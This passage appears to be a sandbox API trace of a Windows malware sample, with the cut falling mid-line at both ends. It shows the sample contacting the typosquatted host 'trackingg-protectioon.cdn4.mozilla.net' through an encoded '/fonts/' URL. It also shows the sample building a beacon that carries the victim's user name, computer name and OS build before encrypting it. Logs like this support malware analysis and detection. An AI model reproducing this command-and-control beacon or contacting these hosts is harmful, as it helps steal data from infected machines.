(lpString="FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H") returned 335 [0079.349] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x157) returned 0x2c59b28 [0079.349] lstrcpyA (in: lpString1=0x2c59b28, lpString2="/fonts/" | out: lpString1="/fonts/") returned="/fonts/" [0079.349] lstrcatA (in: lpString1="/fonts/", lpString2="FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H" | out: lpString1="/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H") returned="/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H" [0079.349] lstrcpyA (in: lpString1=0x2c5b520, lpString2=".bak" | out: lpString1=".bak") returned=".bak" [0079.349] lstrcpyA (in: lpString1=0x2c5ad18, lpString2="trackingg-protectioon.cdn4.mozilla.net" | out: lpString1="trackingg-protectioon.cdn4.mozilla.net") returned="trackingg-protectioon.cdn4.mozilla.net" [0079.349] lstrcatA (in: lpString1="trackingg-protectioon.cdn4.mozilla.net", lpString2="/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H" | out: lpString1="trackingg-protectioon.cdn4.mozilla.net/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H") returned="trackingg-protectioon.cdn4.mozilla.net/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H" [0079.349] lstrcatA (in: lpString1="trackingg-protectioon.cdn4.mozilla.net/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H", lpString2=".bak" | out: lpString1="trackingg-protectioon.cdn4.mozilla.net/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H.bak") returned="trackingg-protectioon.cdn4.mozilla.net/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H.bak" [0079.349] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c4 [0079.349] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1c8 [0079.349] lstrlenA (lpString="trackingg-protectioon.cdn4.mozilla.net/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H.bak") returned 384 [0079.349] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x181) returned 0x2c5b690 [0079.349] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x181) returned 0x2c5b820 [0079.349] StrChrA (lpStart="trackingg-protectioon.cdn4.mozilla.net/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H.bak", wMatch=0x2f) returned="/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H.bak" [0079.349] StrChrA (lpStart="trackingg-protectioon.cdn4.mozilla.net/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H.bak", wMatch=0x3f) returned 0x0 [0079.349] memcpy (in: _Dst=0x2c5b690, _Src=0x2c5ad18, _Size=0x26 | out: _Dst=0x2c5b690) returned 0x2c5b690 [0079.349] lstrcpyA (in: lpString1=0x2c5b820, lpString2="/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H.bak" | out: lpString1="/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H.bak") returned="/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H.bak" [0079.349] lstrlenA (lpString="/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H.bak") returned 346 [0079.349] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2b5) returned 0x2c5b9b0 [0079.349] InternetCanonicalizeUrlA (in: lpszUrl="/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H.bak", lpszBuffer=0x2c5b9b0, lpdwBufferLength=0x11ff040, dwFlags=0x0 | out: lpszBuffer="/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H.bak", lpdwBufferLength=0x11ff040) returned 1 [0079.351] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b820 | out: hHeap=0x2860000) returned 1 [0079.351] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) [0079.351] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0079.351] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x2f7bbd) returned 0x0 [0079.351] ResetEvent (hEvent=0x1c4) returned 1 [0079.351] InternetConnectA (hInternet=0xcc0004, lpszServerName="trackingg-protectioon.cdn4.mozilla.net", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) [0079.351] InternetConnectA (hInternet=0xcc0004, lpszServerName="trackingg-protectioon.cdn4.mozilla.net", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) returned 0xcc0008 [0079.352] SetEvent (hEvent=0x1c4) returned 1 [0079.352] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fonts/FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H.bak", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x11ff074) returned 0xcc000c [0079.352] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040 | out: lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040) returned 1 [0079.352] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044*, dwBufferLength=0x4) returned 1 [0079.352] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0079.352] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0079.352] ResetEvent (hEvent=0x1c4) returned 1 [0079.353] ResetEvent (hEvent=0x1c8) returned 1 [0079.353] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) [0079.353] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0079.353] GetLastError () returned 0x3e5 [0079.353] WaitForSingleObject (hHandle=0x1c4, dwMilliseconds=0x0) returned 0x102 [0079.353] HttpQueryInfoA (hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0) [0079.353] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0079.353] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff02c*=0x1c4, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0079.359] WaitForSingleObject (hHandle=0x1c4, dwMilliseconds=0x0) returned 0x0 [0079.359] SetEvent (hEvent=0x1c4) returned 1 [0079.359] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff048*=0x1c8, bWaitAll=0, dwMilliseconds=0xea60) returned 0x102 [0089.371] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x2f7bbd [0089.371] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0089.371] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x2f7bbd [0089.371] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0089.371] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x2f7bbd [0089.372] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0089.375] CloseHandle (hObject=0x1c4) returned 1 [0089.375] CloseHandle (hObject=0x1c8) returned 1 [0089.376] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b690 | out: hHeap=0x2860000) returned 1 [0089.377] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b9b0 | out: hHeap=0x2860000) returned 1 [0089.378] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0089.378] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b520 | out: hHeap=0x2860000) returned 1 [0089.379] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ad18 | out: hHeap=0x2860000) returned 1 [0089.379] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0089.380] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5a510 | out: hHeap=0x2860000) returned 1 [0089.380] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) [0089.380] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0089.380] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0099.391] wsprintfA (param_1=0x11ff104, param_2="size=%u&hash=0x%08x") [0099.391] wsprintfA (in: param_1=0x11ff104, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0099.392] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5a510 [0099.393] wsprintfA (in: param_1=0x2c5a510, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1") returned 84 [0099.393] QueryPerformanceFrequency (in: lpFrequency=0x11ff0b8 | out: lpFrequency=0x11ff0b8*=100000000) returned 1 [0099.393] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff0b0 | out: lpPerformanceCount=0x11ff0b0*=2778973392025) returned 1 [0099.393] wsprintfA (in: param_1=0x2c5a564, param_2="&uptime=%u" | out: param_1="&uptime=27789") returned 13 [0099.393] wsprintfA (in: param_1=0x2c5a571, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0099.394] wsprintfA (in: param_1=0x2c5a588, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0099.394] GetComputerNameExA (NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc) [0099.394] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0099.396] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c59a68 [0099.396] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2c59a68, nSize=0x11ff0bc | out: lpBuffer="Q9iATrkPrH", nSize=0x11ff0bc) returned 1 [0099.397] wsprintfA (in: param_1=0x2c5a598, param_2="&dns=%s" | out: param_1="&dns=Q9iATrkPrH") returned 15 [0099.397] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0099.397] GetUserNameW (lpBuffer=0x0, pcbBuffer=0x11ff0bc) [0099.397] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff0bc | out: lpBuffer=0x0, pcbBuffer=0x11ff0bc) returned 0 [0099.399] GetComputerNameW (lpBuffer=0x0, nSize=0x11ff0bc) [0099.399] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0099.399] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5c) returned 0x2c59b28 [0099.399] GetUserNameW (in: lpBuffer=0x2c59b56, pcbBuffer=0x11ff0bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff0bc) returned 1 [0099.399] GetComputerNameW (in: lpBuffer=0x2c59b6a, nSize=0x11ff0b8 | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff0b8) returned 1 [0099.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kEecfMwgj@Q9IATRKPRH", cchWideChar=20, lpMultiByteStr=0x2c59b28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj@Q9IATRKPRHgFmN1i/qmUxw2HBsgItuiWx_2Fk", lpUsedDefaultChar=0x0) returned 20 [0099.400] wsprintfA (in: param_1=0x2c5a5a7, param_2="&whoami=%s" | out: param_1="&whoami=kEecfMwgj@Q9IATRKPRH") returned 28 [0099.401] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0099.401] lstrlenA (lpString="80.77.25.109") [0099.401] lstrlenA (lpString="80.77.25.109") returned 12 [0099.401] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd) returned 0x2c59a68 [0099.403] memcpy (in: _Dst=0x2c59a68, _Src=0x2c59e72, _Size=0xc | out: _Dst=0x2c59a68) returned 0x2c59a68 [0099.403] wsprintfA (in: param_1=0x2c5a5c3, param_2="&os=%s" | out: param_1="&os=6.1_1_7601_x64") returned 18 [0099.403] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5ad18 [0099.403] GetTickCount () [0099.403] GetTickCount () returned 0x1a512db [0099.403] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x6) returned 0x2c59a80 [0099.403] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x9) returned 0x2c59b28 [0099.403] lstrlenA (lpString="%s=%s&") returned 6 [0099.403] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x14) returned 0x2c59b40 [0099.403] sprintf (_Dest=0x2c59b40, _Format="%s=%s&") [0099.403] sprintf (in: _Dest=0x2c59b40, _Format="%s=%s&" | out: _Dest="hvdgelpi=ldjih&") returned 15 [0099.403] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0099.403] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a80 | out: hHeap=0x2860000) returned 1 [0099.404] lstrlenA (lpString="hvdgelpi=ldjih&") returned 15 [0099.404] lstrlenA (lpString="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27789&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 197 [0099.404] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd5) returned 0x2c59b60 [0099.404] strcpy (_Dest=0x2c59b60, _Source="hvdgelpi=ldjih&") [0099.404] strcpy (in: _Dest=0x2c59b60, _Source="hvdgelpi=ldjih&" | out: _Dest="hvdgelpi=ldjih&") returned="hvdgelpi=ldjih&" [0099.404] lstrcatA (lpString1="hvdgelpi=ldjih&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27789&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") [0099.404] lstrcatA (in: lpString1="hvdgelpi=ldjih&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27789&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" | out: lpString1="hvdgelpi=ldjih&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27789&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned="hvdgelpi=ldjih&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27789&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" [0099.404] lstrlenA (lpString="hvdgelpi=ldjih&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27789&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 212 [0099.404] CryptAcquireContextW (phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) [0099.404] CryptAcquireContextW (in: phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11ff064*=0x7917d8) returned 1 [0099.406] 